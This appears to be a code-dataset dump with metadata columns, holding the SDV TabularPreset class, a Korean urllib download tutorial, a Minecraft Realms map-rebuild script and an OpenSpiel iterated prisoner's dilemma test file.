sampled (pandas.DataFrame):
The sampled data to postprocess.
Returns:
pandas.DataFrame
"""
if self._null_percentages:
for column, percentage in self._null_percentages.items():
sampled[column] = sampled[column].mask(
np.random.random((len(sampled), )) < percentage)
return sampled
def sample(self, num_rows, randomize_samples=True, batch_size=None, output_file_path=None,
conditions=None):
"""Sample rows from this table.
Args:
num_rows (int):
Number of rows to sample. This parameter is required.
randomize_samples (bool):
Whether or not to use a fixed seed when sampling. Defaults
to True.
batch_size (int or None):
The batch size to sample. Defaults to `num_rows`, if None.
output_file_path (str or None):
The file to periodically write sampled rows to. If None, does not
write rows anywhere.
conditions:
Deprecated argument. Use the `sample_conditions` method with
`sdv.sampling.Condition` objects instead.
Returns:
pandas.DataFrame:
Sampled data.
"""
sampled = self._model.sample(
num_rows, randomize_samples, batch_size, output_file_path, conditions)
return self._postprocess_sampled(sampled)
def sample_conditions(self, conditions, max_tries=100, batch_size_per_try=None,
randomize_samples=True, output_file_path=None):
"""Sample rows from this table with the given conditions.
Args:
conditions (list[sdv.sampling.Condition]):
A list of sdv.sampling.Condition objects, which specify the column
values in a condition, along with the number of rows for that
condition.
max_tries (int):
Number of times to try sampling discarded rows. Defaults to 100.
batch_size_per_try (int):
The batch size to use per attempt at sampling. Defaults to 10 times
the number of rows.
randomize_samples (bool):
Whether or not to use a fixed seed when sampling. Defaults
to True.
output_file_path (str or None):
The file to periodically write sampled rows to. Defaults to
a temporary file, if None.
Returns:
pandas.DataFrame:
Sampled data.
"""
if isinstance(self._model, GaussianCopula):
sampled = self._model.sample_conditions(
conditions,
batch_size=batch_size_per_try,
randomize_samples=randomize_samples,
output_file_path=output_file_path,
)
else:
sampled = self._model.sample_conditions(
conditions, max_tries, batch_size_per_try, randomize_samples, output_file_path)
return self._postprocess_sampled(sampled)
def sample_remaining_columns(self, known_columns, max_tries=100, batch_size_per_try=None,
randomize_samples=True, output_file_path=None):
"""Sample rows from this table.
Args:
known_columns (pandas.DataFrame):
A pandas.DataFrame with the columns that are already known. The output
is a DataFrame such that each row in the output is sampled
conditionally on the corresponding row in the input.
max_tries (int):
Number of times to try sampling discarded rows. Defaults to 100.
batch_size_per_try (int):
The batch size to use per attempt at sampling. Defaults to 10 times
the number of rows.
randomize_samples (bool):
Whether or not to use a fixed seed when sampling. Defaults
to True.
output_file_path (str or None):
The file to periodically write sampled rows to. Defaults to
a temporary file, if None.
Returns:
pandas.DataFrame:
Sampled data.
"""
if isinstance(self._model, GaussianCopula):
sampled = self._model.sample_remaining_columns(
known_columns,
batch_size=batch_size_per_try,
randomize_samples=randomize_samples,
output_file_path=output_file_path,
)
else:
sampled = self._model.sample_remaining_columns(
known_columns, max_tries, batch_size_per_try, randomize_samples, output_file_path)
return self._postprocess_sampled(sampled)
def save(self, path):
"""Save this model instance to the given path using pickle.
Args:
path (str):
Path where the SDV instance will be serialized.
"""
self._package_versions = get_package_versions(getattr(self, '_model', None))
with open(path, 'wb') as output:
pickle.dump(self, output)
@classmethod
def load(cls, path):
"""Load a TabularModel instance from a given path.
Args:
path (str):
Path from which to load the instance.
Returns:
TabularModel:
The loaded tabular model.
"""
with open(path, 'rb') as f:
model = pickle.load(f)
throw_version_mismatch_warning(getattr(model, '_package_versions', None))
return model
@classmethod
def list_available_presets(cls, out=sys.stdout):
"""List the available presets and their descriptions."""
out.write(f'Available presets:\n{PRESETS}\n\n'
'Supply the desired preset using the `name` parameter.\n\n'
'Have any requests for custom presets? Contact the SDV team to learn '
'more an SDV Premium license.\n')
def __repr__(self):
"""Represent tabular preset instance as text.
Returns:
str
"""
return f'TabularPreset(name={self.name})'
|
"""Base class for tabular model presets."""
import logging
import pickle
import sys
import warnings
import numpy as np
import rdt
from sdv.metadata import Table
from sdv.tabular import GaussianCopula
from sdv.utils import get_package_versions, throw_version_mismatch_warning
LOGGER = logging.getLogger(__name__)
FAST_ML_PRESET = 'FAST_ML'
PRESETS = {
FAST_ML_PRESET: 'Use this preset to minimize the time needed to create a synthetic data model.'
}
class TabularPreset():
"""Class for all tabular model presets.
Args:
name (str):
The preset to use.
metadata (dict or metadata.Table):
Table metadata instance or dict representation.
constraints (list[Constraint, dict]):
List of Constraint objects or dicts.
"""
_model = None
_null_percentages = None
_null_column = False
_default_model = GaussianCopula
def __init__(self, name=None, metadata=None, constraints=None):
if name is None:
raise ValueError('You must provide the name of a preset using the `name` '
'parameter. Use `TabularPreset.list_available_presets()` to browse '
'through the options.')
if name not in PRESETS:
raise ValueError(f'`name` must be one of {PRESETS}.')
self.name = name
if metadata is None:
warnings.warn('No metadata provided. Metadata will be automatically '
'detected from your data. This process may not be accurate. '
'We recommend writing metadata to ensure correct data handling.')
if metadata is not None and isinstance(metadata, Table):
metadata = metadata.to_dict()
if metadata is not None and constraints is not None:
metadata['constraints'] = []
for constraint in constraints:
metadata['constraints'].append(constraint.to_dict())
constraints = None
if name == FAST_ML_PRESET:
self._model = GaussianCopula(
table_metadata=metadata,
constraints=constraints,
categorical_transformer='categorical_fuzzy',
default_distribution='gaussian',
rounding=None,
)
# Decide if transformers should model the null column or not.
self._null_column = constraints is not None
if metadata is not None:
self._null_column = len(metadata.get('constraints', [])) > 0
# If transformers should model the null column, pass None to let each transformer
# decide if it's necessary or not.
transformer_null_column = None if self._null_column else False
dtype_transformers = {
'i': rdt.transformers.NumericalTransformer(
dtype=np.int64,
nan='mean' if self._null_column else None,
null_column=transformer_null_column,
min_value='auto',
max_value='auto',
),
'f': rdt.transformers.NumericalTransformer(
dtype=np.float64,
nan='mean' if self._null_column else None,
null_column=transformer_null_column,
min_value='auto',
max_value='auto',
),
'O': rdt.transformers.CategoricalTransformer(fuzzy=True),
'b': rdt.transformers.BooleanTransformer(
nan=-1 if self._null_column else None,
null_column=transformer_null_column,
),
'M': rdt.transformers.DatetimeTransformer(
nan='mean' if self._null_column else None,
null_column=transformer_null_column,
),
}
self._model._metadata._dtype_transformers.update(dtype_transformers)
def fit(self, data):
"""Fit this model to the data.
Args:
data (pandas.DataFrame):
Data to fit the model to.
"""
if not self._null_column:
self._null_percentages = {}
for column, column_data in data.iteritems():
num_nulls = column_data.isna().sum()
if num_nulls > 0:
# Store null percentage for future reference.
self._null_percentages[column] = num_nulls / len(column_data)
self._model.fit(data)
def _postprocess_sampled(self, sampled):
"""Postprocess the sampled data.
Add null values back based on null percentages captured in the fitting process.
Args:
sampled (pandas.DataFrame):
The sampled data to postprocess.
Returns:
pandas.DataFrame
"""
if self._null_percentages:
for column, percentage in self._null_percentages.items():
sampled[column] = sampled[column].mask(
np.random.random((len(sampled), )) < percentage)
return sampled
def sample(self, num_rows, randomize_samples=True, batch_size=None, output_file_path=None,
conditions=None):
"""Sample rows from this table.
Args:
num_rows (int):
Number of rows to sample. This parameter is required.
randomize_samples (bool):
Whether or not to use a fixed seed when sampling. Defaults
to True.
batch_size (int or None):
The batch size to sample. Defaults to `num_rows`, if None.
output_file_path (str or None):
The file to periodically write sampled rows to. If None, does not
write rows anywhere.
conditions:
Deprecated argument. Use the `sample_conditions` method with
`sdv.sampling.Condition` objects instead.
Returns:
pandas.DataFrame:
Sampled data.
"""
sampled = self._model.sample(
num_rows, randomize_samples, batch_size, output_file_path, conditions)
return self._postprocess_sampled(sampled)
def sample_conditions(self, conditions, max_tries=100, batch_size_per_try=None,
randomize_samples=True, output_file_path=None):
"""Sample rows from this table with the given conditions.
Args:
conditions (list[sdv.sampling.Condition]):
A list of sdv.sampling.Condition objects, which specify the column
values in a condition, along with the number of rows for that
condition.
max_tries (int):
Number of times to try sampling discarded rows. Defaults to 100.
batch_size_per_try (int):
The batch size to use per attempt at sampling. Defaults to 10 times
the number of rows.
randomize_samples (bool):
Whether or not to use a fixed seed when sampling. Defaults
to True.
output_file_path (str or None):
The file to periodically write sampled rows to. Defaults to
a temporary file, if None.
Returns:
pandas.DataFrame:
Sampled data.
"""
if isinstance(self._model, GaussianCopula):
sampled = self._model.sample_conditions(
conditions,
batch_size=batch_size_per_try,
randomize_samples=randomize_samples,
output_file_path=output_file_path,
)
else:
sampled = self._model.sample_conditions(
conditions, max_tries, batch_size_per_try, randomize_samples, output_file_path)
return self._postprocess_sampled(sampled)
def sample_remaining_columns(self, known_columns, max_tries=100, batch_size_per_try=None,
randomize_samples=True, output_file_path=None):
"""Sample rows from this table.
Args:
known_columns (pandas.DataFrame):
A pandas.DataFrame with the columns that are already known. The output
is a DataFrame such that each row in the output is sampled
conditionally on the corresponding row in the input.
max_tries (int):
Number of times to try sampling discarded rows. Defaults to 100.
batch_size_per_try (int):
The batch size to use per attempt at sampling. Defaults to 10 times
the number of rows.
randomize_samples (bool):
Whether or not to use a fixed seed when sampling. Defaults
to True.
output_file_path (str or None):
The file to periodically write sampled rows to. Defaults to
a temporary file, if None.
Returns:
pandas.DataFrame:
Sampled data.
"""
if isinstance(self._model, GaussianCopula):
sampled = self._model.sample_remaining_columns(
known_columns,
batch_size=batch_size_per_try,
randomize_samples=randomize_samples,
output_file_path=output_file_path,
)
else:
sampled = self._model.sample_remaining_columns(
known_columns, max_tries, batch_size_per_try, randomize_samples, output_file_path)
return self._postprocess_sampled(sampled)
def save(self, path):
"""Save this model instance to the given path using pickle.
Args:
path (str):
Path where the SDV instance will be serialized.
"""
self._package_versions = get_package_versions(getattr(self, '_model', None))
with open(path, 'wb') as output:
pickle.dump(self, output)
@classmethod
def load(cls, path):
"""Load a TabularModel instance from a given path.
Args:
path (str):
Path from which to load the instance.
Returns:
TabularModel:
The loaded tabular model.
"""
with open(path, 'rb') as f:
model = pickle.load(f)
throw_version_mismatch_warning(getattr(model, '_package_versions', None))
return model
@classmethod
def list_available_presets(cls, out=sys.stdout):
"""List the available presets and their descriptions."""
out.write(f'Available presets:\n{PRESETS}\n\n'
'Supply the desired preset using the `name` parameter.\n\n'
'Have any requests for custom presets? Contact the SDV team to learn '
'more an SDV Premium license.\n')
def __repr__(self):
"""Represent tabular preset instance as text.
Returns:
str
"""
return f'TabularPreset(name={self.name})'
|
en
| 0.749241
|
Base class for tabular model presets. Class for all tabular model presets. Args: name (str): The preset to use. metadata (dict or metadata.Table): Table metadata instance or dict representation. constraints (list[Constraint, dict]): List of Constraint objects or dicts. # Decide if transformers should model the null column or not. # If transformers should model the null column, pass None to let each transformer # decide if it's necessary or not. Fit this model to the data. Args: data (pandas.DataFrame): Data to fit the model to. # Store null percentage for future reference. Postprocess the sampled data. Add null values back based on null percentages captured in the fitting process. Args: sampled (pandas.DataFrame): The sampled data to postprocess. Returns: pandas.DataFrame Sample rows from this table. Args: num_rows (int): Number of rows to sample. This parameter is required. randomize_samples (bool): Whether or not to use a fixed seed when sampling. Defaults to True. batch_size (int or None): The batch size to sample. Defaults to `num_rows`, if None. output_file_path (str or None): The file to periodically write sampled rows to. If None, does not write rows anywhere. conditions: Deprecated argument. Use the `sample_conditions` method with `sdv.sampling.Condition` objects instead. Returns: pandas.DataFrame: Sampled data. Sample rows from this table with the given conditions. Args: conditions (list[sdv.sampling.Condition]): A list of sdv.sampling.Condition objects, which specify the column values in a condition, along with the number of rows for that condition. max_tries (int): Number of times to try sampling discarded rows. Defaults to 100. batch_size_per_try (int): The batch size to use per attempt at sampling. Defaults to 10 times the number of rows. randomize_samples (bool): Whether or not to use a fixed seed when sampling. Defaults to True. output_file_path (str or None): The file to periodically write sampled rows to. Defaults to a temporary file, if None. Returns: pandas.DataFrame: Sampled data. Sample rows from this table. Args: known_columns (pandas.DataFrame): A pandas.DataFrame with the columns that are already known. The output is a DataFrame such that each row in the output is sampled conditionally on the corresponding row in the input. max_tries (int): Number of times to try sampling discarded rows. Defaults to 100. batch_size_per_try (int): The batch size to use per attempt at sampling. Defaults to 10 times the number of rows. randomize_samples (bool): Whether or not to use a fixed seed when sampling. Defaults to True. output_file_path (str or None): The file to periodically write sampled rows to. Defaults to a temporary file, if None. Returns: pandas.DataFrame: Sampled data. Save this model instance to the given path using pickle. Args: path (str): Path where the SDV instance will be serialized. Load a TabularModel instance from a given path. Args: path (str): Path from which to load the instance. Returns: TabularModel: The loaded tabular model. List the available presets and their descriptions. Represent tabular preset instance as text. Returns: str
| 2.372908
| 2
|
online/section02-2.py
|
djangojeng-e/Web-Crawling
| 0
|
6627575
|
# Section02-2
# 파이썬 크롤링 기초
# URLOPEN 함수 기초 사용법
import urllib.request as req
from urllib.error import URLError, HTTPError
# 다운로드 경로 및 파일명
path_list = ["test1.jpg", "index.html"]
# 다운로드 리소스 url
target_url = ["http://post.phinf.naver.net/MjAxOTA2MDdfMTU0/MDAxNTU5ODcxODc3NTU0.4SFrd6PeWF62ewm21H4nu5xae67wvpvVe2VjagQzilcg.iYBSJe5CZ3E_j2wBY5dlWaLHyS2YujdK0ooqPOOvFNkg.JPEG/ILFVJ_GQGHr0HniSIzDBBbUbrjpg.jpg", "http://google.com"]
for i, url in enumerate(target_url):
# ㅇㅖ외처리
try:
# 웹 수신 정보 읽기
response = req.urlopen(url)
# 수신 내용
contents = response.read()
print("----------------------------")
except HTTPError as e:
print("Download failed.")
print("HTTPError code : ", e.code)
except URLError as e:
print("Download failed.")
print("URL Error Reason: ", e.reason)
#성공
else:
print()
print("Download Succeeded.")
# 상태 정보 중간 출력
print('Header Info- {} : {}'.format(i, response.info()))
print('HTTP Status Code: {}'.format(response.getcode()))
print()
with open(path_list[i], 'wb') as c:
c.write(contents)
print("----------------------------")
|
# Section02-2
# 파이썬 크롤링 기초
# URLOPEN 함수 기초 사용법
import urllib.request as req
from urllib.error import URLError, HTTPError
# 다운로드 경로 및 파일명
path_list = ["test1.jpg", "index.html"]
# 다운로드 리소스 url
target_url = ["http://post.phinf.naver.net/MjAxOTA2MDdfMTU0/MDAxNTU5ODcxODc3NTU0.4SFrd6PeWF62ewm21H4nu5xae67wvpvVe2VjagQzilcg.iYBSJe5CZ3E_j2wBY5dlWaLHyS2YujdK0ooqPOOvFNkg.JPEG/ILFVJ_GQGHr0HniSIzDBBbUbrjpg.jpg", "http://google.com"]
for i, url in enumerate(target_url):
# ㅇㅖ외처리
try:
# 웹 수신 정보 읽기
response = req.urlopen(url)
# 수신 내용
contents = response.read()
print("----------------------------")
except HTTPError as e:
print("Download failed.")
print("HTTPError code : ", e.code)
except URLError as e:
print("Download failed.")
print("URL Error Reason: ", e.reason)
#성공
else:
print()
print("Download Succeeded.")
# 상태 정보 중간 출력
print('Header Info- {} : {}'.format(i, response.info()))
print('HTTP Status Code: {}'.format(response.getcode()))
print()
with open(path_list[i], 'wb') as c:
c.write(contents)
print("----------------------------")
|
ko
| 1.000069
|
# Section02-2 # 파이썬 크롤링 기초 # URLOPEN 함수 기초 사용법 # 다운로드 경로 및 파일명 # 다운로드 리소스 url # ㅇㅖ외처리 # 웹 수신 정보 읽기 # 수신 내용 #성공 # 상태 정보 중간 출력
| 3.217454
| 3
|
src/rebuild.py
|
KrusnikViers/MineMap
| 5
|
6627576
|
<filename>src/rebuild.py
#!/usr/bin/python3
import json
import os
import shutil
import subprocess
import time
import requests
from settings import MINECRAFT_TEXTURES_PATH, WORLD_BACKUP_PATH, LOG_FILE_PATH, RENDER_CONFIGURATION_FILE_PATH
class RebuildException(Exception):
pass
def _retry_on_timeout(lambda_f):
timeout_minutes = 15
while True:
try:
return lambda_f()
except requests.exceptions.Timeout as e:
print('Timeout is reached during network call; retrying in {} minutes...'.format(timeout_minutes))
time.sleep(timeout_minutes * 60)
# Download file from |url| to |location|
def _download_to_file(url: str, location: str):
os.makedirs(os.path.dirname(location), exist_ok=True)
download_request = _retry_on_timeout(lambda: requests.get(url, stream=True, timeout=60))
if download_request.status_code != 200:
raise RebuildException('Download from {} to {} failed: {}'.format(url, location, str(download_request)))
with open(location, 'wb') as output_file:
download_request.raw.decode_content = True
shutil.copyfileobj(download_request.raw, output_file)
print('Download complete: {} to {}'.format(url, location))
# GET or POST request on specified url, expects JSON as an answer.
def _get_json(url: str, post_body=None, cookies=None):
if post_body:
current_request = _retry_on_timeout(lambda: requests.post(url, post_body, cookies=cookies, timeout=60))
else:
current_request = _retry_on_timeout(lambda: requests.get(url, cookies=cookies, timeout=60))
try:
return json.loads(current_request.text)
except json.decoder.JSONDecodeError:
raise RebuildException('Bad response from {}: {}'.format(url, current_request.text))
# Execute sequence of shell commands, stops and raises exception, if one of them returned non-zero result.
def _execute_sequence(commands):
for command in commands:
if subprocess.run(command, shell=True).returncode != 0:
raise RebuildException('Shell command failed: {}'.format(command))
# Class for rebuilding a Minecraft map using the minecraft-overviewer. It is caching some data between rebuilds, so it
# is recommended to use the same instance for multiple map renderings.
class OverviewerMapBuilder:
def __init__(self, configuration):
self.email = configuration['email']
self.password = configuration['password']
self.realm_name = configuration['realm_name']
self.current_client = None
self.authorised_cookies = None
@staticmethod
def _get_latest_version_id() -> str:
version_data = _get_json('https://launchermeta.mojang.com/mc/game/version_manifest.json')
return version_data['latest']['release']
def _update_current_client(self, client_id):
# Remove old clients, if any.
_execute_sequence(['rm -f {}'.format(MINECRAFT_TEXTURES_PATH)])
_download_to_file('https://overviewer.org/textures/{}'.format(client_id), MINECRAFT_TEXTURES_PATH)
self.current_client = client_id
def _update_authorised_cookies(self):
request_body = {
'username': self.email,
'password': <PASSWORD>,
'agent': {'name': 'Minecraft', 'version': 1},
'clientToken': '<PASSWORD>'
}
auth_data = _get_json('https://authserver.mojang.com/authenticate', post_body=json.dumps(request_body))
if 'accessToken' not in auth_data or 'selectedProfile' not in auth_data:
raise RebuildException('Bad auth response: {}'.format(auth_data))
self.authorised_cookies = {
'sid': 'token:{}:{}'.format(auth_data['accessToken'], auth_data['selectedProfile']['id']),
'user': auth_data['selectedProfile']['name'],
'version': self.current_client,
}
def _get_world_id(self):
realms_list = _get_json('https://pc.realms.minecraft.net/worlds', cookies=self.authorised_cookies)
if 'servers' not in realms_list or len(realms_list['servers']) == 0:
raise RebuildException('Bad realms list: {}'.format(realms_list))
# Look for the world id among the realms
for server in realms_list['servers']:
if server['name'] == self.realm_name:
return server['id']
raise RebuildException('Realm \'{}\' was not found: {}'.format(self.realm_name, realms_list['servers']))
def _get_world_download_link(self, world_id: str):
try:
backup_metadata = _get_json(
'https://pc.realms.minecraft.net/worlds/{}/slot/1/download'.format(world_id),
cookies=self.authorised_cookies)
except RebuildException as exc:
if 'Retry again later' in str(exc):
print('Should retry again later, waiting 15s...')
time.sleep(15)
backup_metadata = _get_json(
'https://pc.realms.minecraft.net/worlds/{}/slot/1/download'.format(world_id),
cookies=self.authorised_cookies)
else:
raise exc
if 'downloadLink' not in backup_metadata:
raise RebuildException('Bad backup metadata: {}'.format(backup_metadata))
return backup_metadata['downloadLink']
@staticmethod
def _prepare_world_backup(download_link: str):
_download_to_file(download_link, WORLD_BACKUP_PATH)
_execute_sequence([
'gunzip -c /build/world.tar.gz > /build/world.tar',
'tar -xvf /build/world.tar -C /build/'
])
@staticmethod
def _rebuild_map():
_execute_sequence([
'/overviewer/overviewer.py --config={0} >> {1}'.format(RENDER_CONFIGURATION_FILE_PATH, LOG_FILE_PATH),
'/overviewer/overviewer.py --config={0} --genpoi >> {1}'.format(RENDER_CONFIGURATION_FILE_PATH,
LOG_FILE_PATH),
'rm -rf /build/world*'
])
def rebuild(self):
print('Requesting current client version...')
current_client_version = self._get_latest_version_id()
if self.current_client != current_client_version:
print('Updating current client...')
self._update_current_client(current_client_version)
backup_link = None
# Try to use previous token:
if self.authorised_cookies:
try:
print('Requesting backup link with previous token...')
backup_link = self._get_world_download_link(self._get_world_id())
except RebuildException:
pass
if not backup_link:
print('Updating token...')
self._update_authorised_cookies()
print('Requesting backup link...')
backup_link = self._get_world_download_link(self._get_world_id())
print('Downloading and unpacking the world...')
self._prepare_world_backup(backup_link)
print('Rendering...')
self._rebuild_map()
|
<filename>src/rebuild.py
#!/usr/bin/python3
import json
import os
import shutil
import subprocess
import time
import requests
from settings import MINECRAFT_TEXTURES_PATH, WORLD_BACKUP_PATH, LOG_FILE_PATH, RENDER_CONFIGURATION_FILE_PATH
class RebuildException(Exception):
pass
def _retry_on_timeout(lambda_f):
timeout_minutes = 15
while True:
try:
return lambda_f()
except requests.exceptions.Timeout as e:
print('Timeout is reached during network call; retrying in {} minutes...'.format(timeout_minutes))
time.sleep(timeout_minutes * 60)
# Download file from |url| to |location|
def _download_to_file(url: str, location: str):
os.makedirs(os.path.dirname(location), exist_ok=True)
download_request = _retry_on_timeout(lambda: requests.get(url, stream=True, timeout=60))
if download_request.status_code != 200:
raise RebuildException('Download from {} to {} failed: {}'.format(url, location, str(download_request)))
with open(location, 'wb') as output_file:
download_request.raw.decode_content = True
shutil.copyfileobj(download_request.raw, output_file)
print('Download complete: {} to {}'.format(url, location))
# GET or POST request on specified url, expects JSON as an answer.
def _get_json(url: str, post_body=None, cookies=None):
if post_body:
current_request = _retry_on_timeout(lambda: requests.post(url, post_body, cookies=cookies, timeout=60))
else:
current_request = _retry_on_timeout(lambda: requests.get(url, cookies=cookies, timeout=60))
try:
return json.loads(current_request.text)
except json.decoder.JSONDecodeError:
raise RebuildException('Bad response from {}: {}'.format(url, current_request.text))
# Execute sequence of shell commands, stops and raises exception, if one of them returned non-zero result.
def _execute_sequence(commands):
for command in commands:
if subprocess.run(command, shell=True).returncode != 0:
raise RebuildException('Shell command failed: {}'.format(command))
# Class for rebuilding a Minecraft map using the minecraft-overviewer. It is caching some data between rebuilds, so it
# is recommended to use the same instance for multiple map renderings.
class OverviewerMapBuilder:
def __init__(self, configuration):
self.email = configuration['email']
self.password = configuration['password']
self.realm_name = configuration['realm_name']
self.current_client = None
self.authorised_cookies = None
@staticmethod
def _get_latest_version_id() -> str:
version_data = _get_json('https://launchermeta.mojang.com/mc/game/version_manifest.json')
return version_data['latest']['release']
def _update_current_client(self, client_id):
# Remove old clients, if any.
_execute_sequence(['rm -f {}'.format(MINECRAFT_TEXTURES_PATH)])
_download_to_file('https://overviewer.org/textures/{}'.format(client_id), MINECRAFT_TEXTURES_PATH)
self.current_client = client_id
def _update_authorised_cookies(self):
request_body = {
'username': self.email,
'password': <PASSWORD>,
'agent': {'name': 'Minecraft', 'version': 1},
'clientToken': '<PASSWORD>'
}
auth_data = _get_json('https://authserver.mojang.com/authenticate', post_body=json.dumps(request_body))
if 'accessToken' not in auth_data or 'selectedProfile' not in auth_data:
raise RebuildException('Bad auth response: {}'.format(auth_data))
self.authorised_cookies = {
'sid': 'token:{}:{}'.format(auth_data['accessToken'], auth_data['selectedProfile']['id']),
'user': auth_data['selectedProfile']['name'],
'version': self.current_client,
}
def _get_world_id(self):
realms_list = _get_json('https://pc.realms.minecraft.net/worlds', cookies=self.authorised_cookies)
if 'servers' not in realms_list or len(realms_list['servers']) == 0:
raise RebuildException('Bad realms list: {}'.format(realms_list))
# Look for the world id among the realms
for server in realms_list['servers']:
if server['name'] == self.realm_name:
return server['id']
raise RebuildException('Realm \'{}\' was not found: {}'.format(self.realm_name, realms_list['servers']))
def _get_world_download_link(self, world_id: str):
try:
backup_metadata = _get_json(
'https://pc.realms.minecraft.net/worlds/{}/slot/1/download'.format(world_id),
cookies=self.authorised_cookies)
except RebuildException as exc:
if 'Retry again later' in str(exc):
print('Should retry again later, waiting 15s...')
time.sleep(15)
backup_metadata = _get_json(
'https://pc.realms.minecraft.net/worlds/{}/slot/1/download'.format(world_id),
cookies=self.authorised_cookies)
else:
raise exc
if 'downloadLink' not in backup_metadata:
raise RebuildException('Bad backup metadata: {}'.format(backup_metadata))
return backup_metadata['downloadLink']
@staticmethod
def _prepare_world_backup(download_link: str):
_download_to_file(download_link, WORLD_BACKUP_PATH)
_execute_sequence([
'gunzip -c /build/world.tar.gz > /build/world.tar',
'tar -xvf /build/world.tar -C /build/'
])
@staticmethod
def _rebuild_map():
_execute_sequence([
'/overviewer/overviewer.py --config={0} >> {1}'.format(RENDER_CONFIGURATION_FILE_PATH, LOG_FILE_PATH),
'/overviewer/overviewer.py --config={0} --genpoi >> {1}'.format(RENDER_CONFIGURATION_FILE_PATH,
LOG_FILE_PATH),
'rm -rf /build/world*'
])
def rebuild(self):
print('Requesting current client version...')
current_client_version = self._get_latest_version_id()
if self.current_client != current_client_version:
print('Updating current client...')
self._update_current_client(current_client_version)
backup_link = None
# Try to use previous token:
if self.authorised_cookies:
try:
print('Requesting backup link with previous token...')
backup_link = self._get_world_download_link(self._get_world_id())
except RebuildException:
pass
if not backup_link:
print('Updating token...')
self._update_authorised_cookies()
print('Requesting backup link...')
backup_link = self._get_world_download_link(self._get_world_id())
print('Downloading and unpacking the world...')
self._prepare_world_backup(backup_link)
print('Rendering...')
self._rebuild_map()
|
en
| 0.841845
|
#!/usr/bin/python3 # Download file from |url| to |location| # GET or POST request on specified url, expects JSON as an answer. # Execute sequence of shell commands, stops and raises exception, if one of them returned non-zero result. # Class for rebuilding a Minecraft map using the minecraft-overviewer. It is caching some data between rebuilds, so it # is recommended to use the same instance for multiple map renderings. # Remove old clients, if any. # Look for the world id among the realms # Try to use previous token:
| 2.642788
| 3
|
togglws/values.py
|
champion-automatica/toggl_webhooks
| 10
|
6627577
|
# Possible actions returned by the Toggl server
A_INSERT = 'INSERT'
A_UPDATE = 'UPDATE'
A_DELETE = 'DELETE'
# Possible models returned by the Toggl server
M_TIME_ENTRY = 'time_entry'
M_PROJECT = 'project'
M_TASK = 'task'
M_CLIENT = 'client'
M_TAG = 'tag'
|
# Possible actions returned by the Toggl server
A_INSERT = 'INSERT'
A_UPDATE = 'UPDATE'
A_DELETE = 'DELETE'
# Possible models returned by the Toggl server
M_TIME_ENTRY = 'time_entry'
M_PROJECT = 'project'
M_TASK = 'task'
M_CLIENT = 'client'
M_TAG = 'tag'
|
en
| 0.90832
|
# Possible actions returned by the Toggl server # Possible models returned by the Toggl server
| 1.121084
| 1
|
tests/src/year2021/test_day14b.py
|
lancelote/advent_of_code
| 10
|
6627578
|
"""2021 - Day 14 Part 2: Extended Polymerization."""
from textwrap import dedent
from src.year2021.day14b import solve
def test_solve():
task = dedent(
"""
NNCB
CH -> B
HH -> N
CB -> H
NH -> C
HB -> C
HC -> B
HN -> C
NN -> C
BH -> H
NC -> B
NB -> B
BN -> B
BB -> N
BC -> B
CC -> N
CN -> C
"""
).strip()
assert solve(task) == 2188189693529
|
"""2021 - Day 14 Part 2: Extended Polymerization."""
from textwrap import dedent
from src.year2021.day14b import solve
def test_solve():
task = dedent(
"""
NNCB
CH -> B
HH -> N
CB -> H
NH -> C
HB -> C
HC -> B
HN -> C
NN -> C
BH -> H
NC -> B
NB -> B
BN -> B
BB -> N
BC -> B
CC -> N
CN -> C
"""
).strip()
assert solve(task) == 2188189693529
|
en
| 0.525638
|
2021 - Day 14 Part 2: Extended Polymerization. NNCB CH -> B HH -> N CB -> H NH -> C HB -> C HC -> B HN -> C NN -> C BH -> H NC -> B NB -> B BN -> B BB -> N BC -> B CC -> N CN -> C
| 2.496816
| 2
|
open_spiel/python/games/iterated_prisoners_dilemma_test.py
|
xiaohangt/open_spiel
| 0
|
6627579
|
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for iterated_prisoners_dilemma.py."""
from absl.testing import absltest
from open_spiel.python.games import iterated_prisoners_dilemma # pylint: disable=unused-import
import pyspiel
class IteratedPrisonersDilemmaTest(absltest.TestCase):
def test_game_as_turn_based(self):
"""Check the game can be converted to a turn-based game."""
game = pyspiel.load_game("python_iterated_prisoners_dilemma")
turn_based = pyspiel.convert_to_turn_based(game)
pyspiel.random_sim_test(
turn_based, num_sims=10, serialize=False, verbose=True)
def test_game_as_turn_based_via_string(self):
"""Check the game can be created as a turn-based game from a string."""
game = pyspiel.load_game(
"turn_based_simultaneous_game(game=python_iterated_prisoners_dilemma())"
)
pyspiel.random_sim_test(
game, num_sims=10, serialize=False, verbose=True)
def test_game_from_cc(self):
"""Runs our standard game tests, checking API consistency."""
game = pyspiel.load_game("python_iterated_prisoners_dilemma")
pyspiel.random_sim_test(game, num_sims=10, serialize=False, verbose=True)
if __name__ == "__main__":
absltest.main()
|
# Copyright 2019 DeepMind Technologies Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for iterated_prisoners_dilemma.py."""
from absl.testing import absltest
from open_spiel.python.games import iterated_prisoners_dilemma # pylint: disable=unused-import
import pyspiel
class IteratedPrisonersDilemmaTest(absltest.TestCase):
def test_game_as_turn_based(self):
"""Check the game can be converted to a turn-based game."""
game = pyspiel.load_game("python_iterated_prisoners_dilemma")
turn_based = pyspiel.convert_to_turn_based(game)
pyspiel.random_sim_test(
turn_based, num_sims=10, serialize=False, verbose=True)
def test_game_as_turn_based_via_string(self):
"""Check the game can be created as a turn-based game from a string."""
game = pyspiel.load_game(
"turn_based_simultaneous_game(game=python_iterated_prisoners_dilemma())"
)
pyspiel.random_sim_test(
game, num_sims=10, serialize=False, verbose=True)
def test_game_from_cc(self):
"""Runs our standard game tests, checking API consistency."""
game = pyspiel.load_game("python_iterated_prisoners_dilemma")
pyspiel.random_sim_test(game, num_sims=10, serialize=False, verbose=True)
if __name__ == "__main__":
